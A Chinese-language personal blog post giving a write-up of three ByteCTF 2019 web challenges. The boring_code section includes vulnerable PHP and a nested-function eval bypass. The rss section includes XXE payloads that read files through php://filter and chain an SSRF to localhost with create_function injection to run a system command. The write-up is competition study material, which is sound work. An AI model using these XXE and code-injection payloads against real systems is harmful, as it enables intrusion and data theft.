

Ywc's blog

Ywc's blog

ByteCTF2019



ByteCTF2019

CTF

Word count: 1.2kReading time: 6 min

 2019/09/26   Share

• 
• 
• 
• 
• 

• Web - boring_code
• Web - EzCMS
• Web - rss

Web - boring_code

源代码提示，flag在index.php，源代码在/code/index.php。

去访问/code/index.php，看到源代码。

<?php
function is_valid_url($url) {
    if (filter_var($url, FILTER_VALIDATE_URL)) {
        if (preg_match('/data:\/\//i', $url)) {
            return false;
        }
        return true;
    }
    return false;
}

if (isset($_POST['url'])){
    $url = $_POST['url'];
    if (is_valid_url($url)) {
        $r = parse_url($url);
        if (preg_match('/baidu\.com$/', $r['host'])) {
            $code = file_get_contents($url);
            if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
                if (preg_match('/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
                    echo 'bye~';
                } else {
                    eval($code);
                }
            }
        } else {
            echo "error: host not allowed";
        }
    } else {
        echo "error: invalid url";
    }
}else{
    highlight_file(__FILE__);
}

可以post一个url参数，然后获取url内容进行eval代码执行。

这里url做了过滤，不允许data://，而且parse_url的host要以baidu.com结尾。

直接买个域名，ctfbaidu.com，过了第一步。

这里code也做了过滤，只能调用函数名为小写a-z的函数，而且要嵌套调用，另外还过滤了一些关键词。

/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i

那么将php手册里的所有函数过滤一下，符合过滤规则的，只有100-200个函数可用。

找到一个compact函数，可以将变量合并进数组。源代码里有个$r，url可控，所以可以直接用它。

可控字符串放在url的参数位置，parse_url后，落入$r["query"]。

http://test.ctfbaidu.com/1.txt?../index.php

然后r的ascii为114，chr(time())里面time()%256==114时，compact可以读入$r，然后end(end())两次可以取出$r["query"]的值，然后直接readfile读到flag。过了第二步。

readfile(end(end(compact(chr(time())))));

256秒一轮回。

flag: bytectf{8866b40fea76845e5cbc84ad5ea9920e}

Web - EzCMS

这题刚开始环境配置有问题，能直接读flag了。

随便填用户名和密码，就能登录进去到上传界面。

下面的view detail给了个链接：

http://112.126.102.158:9999/view.php?filename=.htaccess&filepath=./sandbox/bdb9d44736878323443209e1df37b645/.htaccess

看到sandbox直接访问列目录、列文件：

flag: bytectf{4338afbd-d09b-11e9-96cf-88e9fe533d19}

Web - rss

一个rss阅读器，能解析远程url的rss。

url只允许aliyun.com、baidu.com、qq.com，直接用之前买的ctfbaidu.com。

提供了一个example rss文件，看到xml格式想到xxe。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE title [
    <!ENTITY result SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>1</title><link>1</link><description>&result;</description><atom:link href="#" rel="self"></atom:link><language>1</language><lastBuildDate>1</lastBuildDate><item><title>1</title><link>1</link><description>1</description><pubDate>1</pubDate><guid>1</guid></item></channel></rss>

xxe能读到文件。把源代码读出来审。

读到routes.php关键代码：

Route::set('rss_in_order',function(){
    if(!isset($_REQUEST['rss_url']) && !isset($_REQUEST['order'])){
        Admin::createView('Admin');
    }else{
      if($_SERVER['REMOTE_ADDR'] == '127.0.0.1' || $_SERVER['REMOTE_ADDR'] == '::1'){
        Admin::sort($_REQUEST['rss_url'],$_REQUEST['order']);
      }else{
       echo ";(";
      }
    }
});

读到controllers/Admin.php关键代码：

<?php

class Admin extends Controller{
    public static function sort($url,$order){
        $rss=file_get_contents($url);
        $rss=simplexml_load_string($rss,'SimpleXMLElement', LIBXML_NOENT);
        require_once './views/Admin.php';
    }
}

读到views/Admin.php关键代码：

<?php
if($_SERVER['REMOTE_ADDR'] != '127.0.0.1'){
    die(';(');
}
?>
<?php include('package/header.php') ?>
<?php if(!$rss) {
    ?>
    <?php 
    $data = [];
    foreach($rss->channel->item as $item){
        $data[] = $item;
    }
    usort($data, create_function('$a, $b', 'return strcmp($a->'.$order.',$b->'.$order.');'));
    foreach($data as $item){    
    ?>

    <?php }?>

结合在一起，就是本地127.0.0.1发请求可以访问到/rss_in_order，然后usort里的create_function中带入可控参数$order，实现任意命令执行。

能够getflag的payload：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE title [
    <!ENTITY result SYSTEM "php://filter/convert.base64-encode/resource=http://127.0.0.1/rss_in_order?order=title%2C0)%3B%7Dsystem('cat%20/flag_eb8ba2eb07702e69963a7d6ab8669134')%3B%2F*&rss_url=http://112.126.96.50:9999/file/example">
]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>1</title><link>1</link><description>&result;</description><atom:link href="#" rel="self"></atom:link><language>1</language><lastBuildDate>1</lastBuildDate><item><title>1</title><link>1</link><description>1</description><pubDate>1</pubDate><guid>1</guid></item></channel></rss>

flag: bytectf{61878fa75f293f179a895bf74e358a4f}

Author：V1ZkRA

Link：https://yinwc.github.io/2019/09/26/ByteCTF/

Publish date：September 26th 2019, 10:37:54 am

Update date：February 2nd 2023, 2:26:11 pm

License：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  Zabbix漏洞总结
• Previous Post
  应用安全测试技术

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. Web - boring_code
2. 2. Web - EzCMS
3. 3. Web - rss

• Archive
• Tag
• Cate

Total : 131

2023

• 06/19 云安全
• 03/06 人生的灯塔

2022

• 06/18 应急响应笔记
• 05/21 SRC挖洞经验总结
• 02/26 SCA——软件成分分析
• 01/13 shiro 权限绕过系列汇总

2021

• 12/12 深入理解Log4j2远程命令执行漏洞
• 08/06 PHP弱类型漏洞总结
• 06/16 深入理解Shiro721（Apache Shiro RememberMe Padding Oracle 漏洞）
• 05/21 理解RASP技术
• 04/30 深入理解JSONP漏洞
• 03/15 CSP、同源策略与跨域请求(JSONP/CORS)
• 02/24 甲方安全建设
• 02/02 深入理解SQL盲注与SQL预编译
• 01/12 基于Celery的后台任务

2020

• 12/18 安全事件以及后续整改的反思
• 11/28 LeetCode的一些记录
• 11/20 深入理解CORS漏洞
• 10/13 前端框架之Bootstrap学习
• 09/09 App安全评估思路总结
• 08/18 安全测试之我见
• 07/28 CSRF漏洞总结
• 07/21 Fastjson漏洞总结
• 06/28 XSS漏洞总结
• 06/21 Python-scripts
• 06/16 MQTT安全初探
• 06/06 假红包事件——一次应急响应
• 05/12 逻辑漏洞之我见
• 04/21 文件上传漏洞总结
• 03/21 https安全机制
• 03/01 CVE-2020-1938:Tomcat AJP文件包含漏洞分析
• 02/18 从后台getshell到内网漫游
• 02/08 从0开始学Java反序列化漏洞
• 02/01 Python多线程
• 01/31 Python数据处理
• 01/21 应急响应笔记之Linux篇
• 01/03 Java代码审计

2019

• 12/31 WEB应用漏洞及修复
• 12/15 Python3爬虫知识梳理
• 11/20 提权笔记
• 11/18 Python flask框架学习记录
• 11/11 Python虚拟环境管理
• 11/06 Apache Solr Velocity模板注入RCE漏洞复现
• 10/24 甲方安全建设初探
• 10/08 常见算法
• 09/29 Zabbix漏洞总结
• 09/26 ByteCTF2019
• 09/19 应用安全测试技术
• 09/02 WebminRCE复现
• 08/17 SUCTF2019
• 08/14 内网渗透到后渗透的基本思路
• 08/03 De1CTF_WriteUp
• 07/25 Anaconda学习笔记
• 07/06 Django学习笔记
• 06/15 SDL安全开发生命周期
• 06/02 2019国赛华东北赛区线下
• 05/21 AWS搭建SS
• 05/15 内网渗透--nps的学习
• 05/06 docker的学习
• 04/22 深入理解异或操作
• 04/16 MySQL提权
• 04/15 DDCTF2019
• 03/20 LintCode代码练习
• 03/18 MSF常用操作
• 03/07 Linux下反弹shell的方法
• 03/06 python爬虫数据提取
• 02/28 xss靶场练习
• 02/27 Ddos分布式拒绝服务攻击
• 02/18 python爬虫
• 02/15 python爬虫实战
• 02/02 安全从业人员的职业规划
• 01/28 渗透测试之信息收集
• 01/26 反向代理
• 01/17 某cms后台getshell
• 01/16 使用U盘重装系统

2018

• 12/31 Ubuntu16.04本地提权漏洞(CVE-2017-16995)
• 12/25 安恒杯12月月赛
• 12/10 CVE-2017-12617远程代码执行漏洞
• 12/06 CTF常用脚本整理
• 12/03 Git learn
• 11/24 安恒11月月赛Write-up
• 11/19 XXE漏洞总结
• 11/16 SSRF漏洞总结
• 11/15 vulhub漏洞复现
• 11/15 MISC总结
• 11/14 CRC32碰撞
• 11/10 N1CTF2018题目复现
• 11/08 不包含数字和字母的webshell
• 11/08 python沙箱逃逸
• 11/03 理解公钥与私钥
• 10/29 WEB安全攻防渗透测试实战指南脑图
• 10/17 渗透测试流程总结
• 10/14 windows 应急流程及实战演练
• 10/01 Web安全知识整理
• 09/29 Metasploit 渗透练习
• 09/28 代码审计练习
• 09/16 易霖博杯 赛后总结
• 09/09 一些脚本整理
• 09/09 渗透测试神器BurpSuite pro v2.0beta 使用教程
• 08/31 网鼎杯题目整理
• 08/27 配置路由表
• 08/08 SJU集训结业&淘汰赛 Write Up
• 08/06 网络安全学习
• 08/05 RCTF-2018 cpushop
• 07/31 从一道CTF题看gopher协议的攻击面
• 07/30 dedecms后台getshell漏洞还原分析
• 07/30 Padding Oracle Attack
• 07/27 Ubuntu 18.04 mysql的使用
• 07/26 PHP代码审计练习
• 07/26 Hydra 爆破神器的使用
• 07/25 巅峰极客第一场web复现
• 07/25 巅峰极客 OneThink/Thinkphp 的缓存getshell漏洞
• 07/12 渗透基础
• 07/11 Game-of-Thrones-CTF-1.0靶机实战演练
• 07/05 Sqlmap 使用总结
• 07/04 java环境配置及版本共存问题
• 07/04 SQL注入总结
• 07/04 墨者学院平台修炼
• 07/02 iis文件解析漏洞
• 06/14 mimikatz内网渗透
• 06/06 Wireshark-流量分析
• 06/03 PHP反序列化漏洞
• 06/01 git learn
• 05/30 Markdown语法总结
• 05/29 Web源码泄露总结
• 05/28 学习python中遇到的问题及总结
• 05/18 Crypto_RSA算法总结
• 05/16 日常学习中问题
• 05/09 Pythonlearn
• 03/24 2018 QWB 题目整理
• 02/14 搭博客的经历

 CTF  企业安全  learn  python  漏洞  安全评估  前端安全  安全开发  代码审计  SRC  problem  渗透测试  Crypto  应急响应  云安全  SCA



缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98

 blog  漏洞  learn

